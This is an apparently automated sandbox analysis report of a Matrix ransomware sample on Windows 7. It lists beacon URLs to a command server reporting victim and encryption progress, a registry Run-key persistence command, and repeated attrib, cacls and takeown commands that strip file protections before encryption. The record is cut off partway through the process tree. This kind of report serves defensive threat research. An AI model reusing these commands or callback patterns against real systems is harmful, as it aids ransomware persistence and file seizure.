matrix | 46dc49be65d7165e2a6009854a4f27f0088230199e61e0555cb1bd266535874a

Analysis

max time kernel
154s
max time network
77s
platform
windows7_x64
resource
win7
submitted
11-08-2020 12:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

foo/383497fda5ca670a06dc688443c2011b.exe

Score

10^/10

matrix discovery persistence ransomware

Malware Config

Signatures

Matrix Ransomware 5 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

description	flow	ioc
HTTP URL	2	http://murikos.in/add.php?apikey=BKTqstat&compuser=AVGLFESB\|Admin&sid=9Jpdm4jlfeZbbhrn&phase=START
HTTP URL	3	http://murikos.in/add.php?apikey=BKTqstat&compuser=AVGLFESB\|Admin&sid=IZb9Dgph9anMZt9W&phase=START
HTTP URL	4	http://murikos.in/add.php?apikey=BKTqstat&compuser=AVGLFESB\|Admin&sid=9Jpdm4jlfeZbbhrn&phase=L_05D38E07E3C44508_7593_1GB
HTTP URL	5	http://murikos.in/add.php?apikey=BKTqstat&compuser=AVGLFESB\|Admin&sid=9Jpdm4jlfeZbbhrn&phase=L_DONE_10
HTTP URL	6	http://murikos.in/add.php?apikey=BKTqstat&compuser=AVGLFESB\|Admin&sid=9Jpdm4jlfeZbbhrn&phase=L_DONE_100

Executes dropped EXE 1 IoCs

Processes:

n383497fda5ca670a06dc688443c2011b.exe

pid process

1404 n383497fda5ca670a06dc688443c2011b.exe
Loads dropped DLL 2 IoCs

Processes:

383497fda5ca670a06dc688443c2011b.exe

pid process

316 383497fda5ca670a06dc688443c2011b.exe
316 383497fda5ca670a06dc688443c2011b.exe

pid	process
1404	n383497fda5ca670a06dc688443c2011b.exe

pid	process
316	383497fda5ca670a06dc688443c2011b.exe
316	383497fda5ca670a06dc688443c2011b.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

pid	process
1444
1476
1648
1100	takeown.exe
1112	takeown.exe
668	takeown.exe
1948	takeown.exe
676
1900	takeown.exe
1320
1924
1988
1700	takeown.exe
760	takeown.exe
1888
1136
1792
1472
1192
816
1176
1412
2000	takeown.exe
1684	takeown.exe
240	takeown.exe
1700
1920
332
1792
1668	takeown.exe
1176
836	takeown.exe
668
1984
744
1632	takeown.exe
836	takeown.exe
1136
556
268
1504	takeown.exe
1220	takeown.exe
1920	takeown.exe
1544
1948
1816	takeown.exe
2036
1044
1552
1068	takeown.exe
1388	takeown.exe
888	takeown.exe
1556
1852
1056
1988
1452
1400	takeown.exe
1608	takeown.exe
1788	takeown.exe
1552	takeown.exe
1628
1484
592

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\README = "\"C:\\Program Files (x86)\\Windows NT\\Accessories\\wordpad.exe\" \"C:\\Users\\Admin\\AppData\\Roaming\\#What_Wrong_With_Files#.rtf\""	reg.exe

Drops desktop.ini file(s) 3 IoCs

Processes:

383497fda5ca670a06dc688443c2011b.exe

description	ioc	process
File opened for modification	C:\$Recycle.Bin\S-1-5-21-1131729243-447456001-3632642222-1000\desktop.ini	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\desktop.ini	383497fda5ca670a06dc688443c2011b.exe

Enumerates connected drives 3 TTPs 22 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

383497fda5ca670a06dc688443c2011b.exe

description	ioc	process
File opened (read-only)	\??\Z:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\Y:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\U:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\K:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\H:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\V:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\R:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\M:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\G:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\F:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\T:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\Q:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\O:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\N:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\L:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\J:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\X:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\W:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\S:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\P:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\I:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\E:	383497fda5ca670a06dc688443c2011b.exe

Drops file in Program Files directory 64 IoCs

Processes:

383497fda5ca670a06dc688443c2011b.exeattrib.exeattrib.exeattrib.exeattrib.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt	383497fda5ca670a06dc688443c2011b.exe
File created	C:\Program Files\VideoLAN\VLC\#What_Wrong_With_Files#.rtf	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.chm	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\THEMES14\PIXEL\PIXEL.ELM	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\Welcome.html	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_VideoInset.png
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationLeft_SelectionSubpicture.png	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad.xml	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\tipresx.dll.mui	attrib.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\en-US\msadcer.dll.mui	attrib.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_uparrow.png	attrib.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Perf_Scenes_Mask1.png	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-static.png
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansRegular.ttf	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Microsoft Office\Stationery\1033\SEAMARBL.JPG	383497fda5ca670a06dc688443c2011b.exe
File created	C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ENFR\#What_Wrong_With_Files#.rtf	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground.wmv	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-next-over-select.png
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages.properties	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web.xml	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.config	383497fda5ca670a06dc688443c2011b.exe
File created	C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\#What_Wrong_With_Files#.rtf	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\performance.png	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\vistabg.png
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationRight_ButtonGraphic.png	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\White_Chocolate.jpg	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dataset.zip	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\en-US\sqlxmlx.rll.mui	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\desktop.ini	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\notes-static.png	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationRight_ButtonGraphic.png
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\Certificates\Verisign\Components\VS_ComponentSigningIntermediate.cer	383497fda5ca670a06dc688443c2011b.exe
File created	C:\Program Files\Common Files\Microsoft Shared\Stationery\#What_Wrong_With_Files#.rtf	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7\1033\VBOB6.CHM	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.xml	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_RGB_PAL.wmv	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationRight_ButtonGraphic.png	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfontj2d.properties	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.jar	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h	383497fda5ca670a06dc688443c2011b.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\#What_Wrong_With_Files#.rtf	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipsdeu.xml	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\tipresx.dll.mui	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\PowerPoint.en-us\SETUP.XML	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\ParentMenuButtonIcon.png
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDownArrow.jpg	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\VeriSignLogo.jpg	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\blackbars60.png
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\THEMES14\ICE\PREVIEW.GIF	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\FREN\MSB1FREN.ITS	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_Buttongraphic.png	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.properties	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt.txt	383497fda5ca670a06dc688443c2011b.exe
File created	C:\Program Files\Java\jdk1.7.0_80\#What_Wrong_With_Files#.rtf	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Stars.jpg	383497fda5ca670a06dc688443c2011b.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

description	pid	process
Token: SeTakeOwnershipPrivilege	1968	takeown.exe
Token: SeTakeOwnershipPrivilege	472	takeown.exe
Token: SeTakeOwnershipPrivilege	1100	takeown.exe
Token: SeTakeOwnershipPrivilege	1592	takeown.exe
Token: SeTakeOwnershipPrivilege	1068	takeown.exe
Token: SeTakeOwnershipPrivilege	1848	takeown.exe
Token: SeTakeOwnershipPrivilege	1780	takeown.exe
Token: SeTakeOwnershipPrivilege	1644	takeown.exe
Token: SeTakeOwnershipPrivilege	1980	takeown.exe
Token: SeTakeOwnershipPrivilege	1228	takeown.exe
Token: SeTakeOwnershipPrivilege	1572	takeown.exe
Token: SeTakeOwnershipPrivilege	1400	takeown.exe
Token: SeTakeOwnershipPrivilege	1056	takeown.exe
Token: SeTakeOwnershipPrivilege	1820	takeown.exe
Token: SeTakeOwnershipPrivilege	1792	takeown.exe
Token: SeTakeOwnershipPrivilege	1404	takeown.exe
Token: SeTakeOwnershipPrivilege	1444	takeown.exe
Token: SeTakeOwnershipPrivilege	1648	takeown.exe
Token: SeTakeOwnershipPrivilege	2036	takeown.exe
Token: SeTakeOwnershipPrivilege	752	takeown.exe
Token: SeTakeOwnershipPrivilege	1064	takeown.exe
Token: SeTakeOwnershipPrivilege	1512	takeown.exe
Token: SeTakeOwnershipPrivilege	1816	takeown.exe
Token: SeTakeOwnershipPrivilege	1788	takeown.exe
Token: SeTakeOwnershipPrivilege	1692	takeown.exe
Token: SeTakeOwnershipPrivilege	1908	takeown.exe
Token: SeTakeOwnershipPrivilege	904	takeown.exe
Token: SeTakeOwnershipPrivilege	1036	takeown.exe
Token: SeTakeOwnershipPrivilege	1940	takeown.exe
Token: SeTakeOwnershipPrivilege	1496	takeown.exe
Token: SeTakeOwnershipPrivilege	240	takeown.exe
Token: SeTakeOwnershipPrivilege	1088	takeown.exe
Token: SeTakeOwnershipPrivilege	1796	takeown.exe
Token: SeTakeOwnershipPrivilege	1896	takeown.exe
Token: SeTakeOwnershipPrivilege	1544	takeown.exe
Token: SeTakeOwnershipPrivilege	1968	takeown.exe
Token: SeTakeOwnershipPrivilege	1104	takeown.exe
Token: SeTakeOwnershipPrivilege	1912	takeown.exe
Token: SeTakeOwnershipPrivilege	1388	takeown.exe
Token: SeTakeOwnershipPrivilege	1068	takeown.exe
Token: SeTakeOwnershipPrivilege	1492	takeown.exe
Token: SeTakeOwnershipPrivilege	1840	takeown.exe
Token: SeTakeOwnershipPrivilege	1876	takeown.exe
Token: SeTakeOwnershipPrivilege	812	takeown.exe
Token: SeTakeOwnershipPrivilege	1956	takeown.exe
Token: SeTakeOwnershipPrivilege	1916	takeown.exe
Token: SeTakeOwnershipPrivilege	1100	takeown.exe
Token: SeTakeOwnershipPrivilege	1488	takeown.exe
Token: SeTakeOwnershipPrivilege	816	takeown.exe
Token: SeTakeOwnershipPrivilege	1812	takeown.exe
Token: SeTakeOwnershipPrivilege	1868	takeown.exe
Token: SeTakeOwnershipPrivilege	1680	takeown.exe
Token: SeTakeOwnershipPrivilege	1504	takeown.exe
Token: SeTakeOwnershipPrivilege	760	takeown.exe
Token: SeTakeOwnershipPrivilege	1112	takeown.exe
Token: SeTakeOwnershipPrivilege	1948	takeown.exe
Token: SeTakeOwnershipPrivilege	1412	takeown.exe
Token: SeTakeOwnershipPrivilege	1700	takeown.exe
Token: SeTakeOwnershipPrivilege	1836	takeown.exe
Token: SeTakeOwnershipPrivilege	1632	takeown.exe
Token: SeTakeOwnershipPrivilege	1972	takeown.exe
Token: SeTakeOwnershipPrivilege	844	takeown.exe
Token: SeTakeOwnershipPrivilege	888	takeown.exe
Token: SeTakeOwnershipPrivilege	1400	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

383497fda5ca670a06dc688443c2011b.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 316 wrote to memory of 1404	316	383497fda5ca670a06dc688443c2011b.exe	n383497fda5ca670a06dc688443c2011b.exe
PID 316 wrote to memory of 1404	316	383497fda5ca670a06dc688443c2011b.exe	n383497fda5ca670a06dc688443c2011b.exe
PID 316 wrote to memory of 1404	316	383497fda5ca670a06dc688443c2011b.exe	n383497fda5ca670a06dc688443c2011b.exe
PID 316 wrote to memory of 1404	316	383497fda5ca670a06dc688443c2011b.exe	n383497fda5ca670a06dc688443c2011b.exe
PID 316 wrote to memory of 1608	316	383497fda5ca670a06dc688443c2011b.exe	cmd.exe
PID 316 wrote to memory of 1608	316	383497fda5ca670a06dc688443c2011b.exe	cmd.exe
PID 316 wrote to memory of 1608	316	383497fda5ca670a06dc688443c2011b.exe	cmd.exe
PID 316 wrote to memory of 1608	316	383497fda5ca670a06dc688443c2011b.exe	cmd.exe
PID 1608 wrote to memory of 1632	1608	cmd.exe	reg.exe
PID 1608 wrote to memory of 1632	1608	cmd.exe	reg.exe
PID 1608 wrote to memory of 1632	1608	cmd.exe	reg.exe
PID 1608 wrote to memory of 1632	1608	cmd.exe	reg.exe
PID 316 wrote to memory of 1900	316	383497fda5ca670a06dc688443c2011b.exe	cmd.exe
PID 316 wrote to memory of 1900	316	383497fda5ca670a06dc688443c2011b.exe	cmd.exe
PID 316 wrote to memory of 1900	316	383497fda5ca670a06dc688443c2011b.exe	cmd.exe
PID 316 wrote to memory of 1900	316	383497fda5ca670a06dc688443c2011b.exe	cmd.exe
PID 1900 wrote to memory of 2000	1900	cmd.exe	attrib.exe
PID 1900 wrote to memory of 2000	1900	cmd.exe	attrib.exe
PID 1900 wrote to memory of 2000	1900	cmd.exe	attrib.exe
PID 1900 wrote to memory of 2000	1900	cmd.exe	attrib.exe
PID 1900 wrote to memory of 1992	1900	cmd.exe	cacls.exe
PID 1900 wrote to memory of 1992	1900	cmd.exe	cacls.exe
PID 1900 wrote to memory of 1992	1900	cmd.exe	cacls.exe
PID 1900 wrote to memory of 1992	1900	cmd.exe	cacls.exe
PID 1900 wrote to memory of 1968	1900	cmd.exe	takeown.exe
PID 1900 wrote to memory of 1968	1900	cmd.exe	takeown.exe
PID 1900 wrote to memory of 1968	1900	cmd.exe	takeown.exe
PID 1900 wrote to memory of 1968	1900	cmd.exe	takeown.exe
PID 316 wrote to memory of 2040	316	383497fda5ca670a06dc688443c2011b.exe	cmd.exe
PID 316 wrote to memory of 2040	316	383497fda5ca670a06dc688443c2011b.exe	cmd.exe
PID 316 wrote to memory of 2040	316	383497fda5ca670a06dc688443c2011b.exe	cmd.exe
PID 316 wrote to memory of 2040	316	383497fda5ca670a06dc688443c2011b.exe	cmd.exe
PID 2040 wrote to memory of 884	2040	cmd.exe	attrib.exe
PID 2040 wrote to memory of 884	2040	cmd.exe	attrib.exe
PID 2040 wrote to memory of 884	2040	cmd.exe	attrib.exe
PID 2040 wrote to memory of 884	2040	cmd.exe	attrib.exe
PID 2040 wrote to memory of 524	2040	cmd.exe	cacls.exe
PID 2040 wrote to memory of 524	2040	cmd.exe	cacls.exe
PID 2040 wrote to memory of 524	2040	cmd.exe	cacls.exe
PID 2040 wrote to memory of 524	2040	cmd.exe	cacls.exe
PID 2040 wrote to memory of 472	2040	cmd.exe	takeown.exe
PID 2040 wrote to memory of 472	2040	cmd.exe	takeown.exe
PID 2040 wrote to memory of 472	2040	cmd.exe	takeown.exe
PID 2040 wrote to memory of 472	2040	cmd.exe	takeown.exe
PID 316 wrote to memory of 556	316	383497fda5ca670a06dc688443c2011b.exe	cmd.exe
PID 316 wrote to memory of 556	316	383497fda5ca670a06dc688443c2011b.exe	cmd.exe
PID 316 wrote to memory of 556	316	383497fda5ca670a06dc688443c2011b.exe	cmd.exe
PID 316 wrote to memory of 556	316	383497fda5ca670a06dc688443c2011b.exe	cmd.exe
PID 556 wrote to memory of 1584	556	cmd.exe	attrib.exe
PID 556 wrote to memory of 1584	556	cmd.exe	attrib.exe
PID 556 wrote to memory of 1584	556	cmd.exe	attrib.exe
PID 556 wrote to memory of 1584	556	cmd.exe	attrib.exe
PID 556 wrote to memory of 1576	556	cmd.exe	cacls.exe
PID 556 wrote to memory of 1576	556	cmd.exe	cacls.exe
PID 556 wrote to memory of 1576	556	cmd.exe	cacls.exe
PID 556 wrote to memory of 1576	556	cmd.exe	cacls.exe
PID 556 wrote to memory of 1100	556	cmd.exe	takeown.exe
PID 556 wrote to memory of 1100	556	cmd.exe	takeown.exe
PID 556 wrote to memory of 1100	556	cmd.exe	takeown.exe
PID 556 wrote to memory of 1100	556	cmd.exe	takeown.exe
PID 316 wrote to memory of 1048	316	383497fda5ca670a06dc688443c2011b.exe	cmd.exe
PID 316 wrote to memory of 1048	316	383497fda5ca670a06dc688443c2011b.exe	cmd.exe
PID 316 wrote to memory of 1048	316	383497fda5ca670a06dc688443c2011b.exe	cmd.exe
PID 316 wrote to memory of 1048	316	383497fda5ca670a06dc688443c2011b.exe	cmd.exe

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
240
1908	attrib.exe
112	attrib.exe
760	attrib.exe
1468
1848	attrib.exe
536	attrib.exe
1848
612
1624	attrib.exe
752	attrib.exe
1276	attrib.exe
1512	attrib.exe
1048	attrib.exe
2008
2040
1452
1460	attrib.exe
1904	attrib.exe
1040	attrib.exe
816	attrib.exe
928
1324
1768
2016
1828
1768	attrib.exe
1048	attrib.exe
568	attrib.exe
1668	attrib.exe
1464	attrib.exe
1444
1976
1824	attrib.exe
1488	attrib.exe
1644	attrib.exe
1896	attrib.exe
1336	attrib.exe
1488
1680	attrib.exe
1872	attrib.exe
912	attrib.exe
1848	attrib.exe
1748	attrib.exe
748	attrib.exe
816
556
968
1332	attrib.exe
1860	attrib.exe
1944	attrib.exe
1484
960
1692	attrib.exe
676	attrib.exe
836	attrib.exe
1176
672
1572
1056
1996
748
1788
1636

C:\Users\Admin\AppData\Local\Temp\foo\383497fda5ca670a06dc688443c2011b.exe
"C:\Users\Admin\AppData\Local\Temp\foo\383497fda5ca670a06dc688443c2011b.exe"
1⤵
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:316
- C:\Users\Admin\AppData\Local\Temp\foo\n383497fda5ca670a06dc688443c2011b.exe
  "C:\Users\Admin\AppData\Local\Temp\foo\n383497fda5ca670a06dc688443c2011b.exe" -n
  2⤵
  - Executes dropped EXE
  PID:1404
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v README /t REG_SZ /d "\"%ProgramFiles%\Windows NT\Accessories\wordpad.exe\" \"C:\Users\Admin\AppData\Roaming\#What_Wrong_With_Files#.rtf"" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1608
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v README /t REG_SZ /d "\"C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe\" \"C:\Users\Admin\AppData\Roaming\#What_Wrong_With_Files#.rtf"" /f
    3⤵
    - Adds Run key to start application
    PID:1632
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.jpg""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1900
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.jpg"
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.jpg" /E /G Admin:F /C
    3⤵
    PID:1992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Blue_Gradient.jpg""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2040
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Blue_Gradient.jpg"
    3⤵
    PID:884
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Blue_Gradient.jpg" /E /G Admin:F /C
    3⤵
    PID:524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Blue_Gradient.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:472
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.jpg""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:556
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.jpg"
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.jpg" /E /G Admin:F /C
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1100
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\GreenBubbles.jpg""
  2⤵
  PID:1048
- - C:\Windows\SysWOW64\attrib.exe
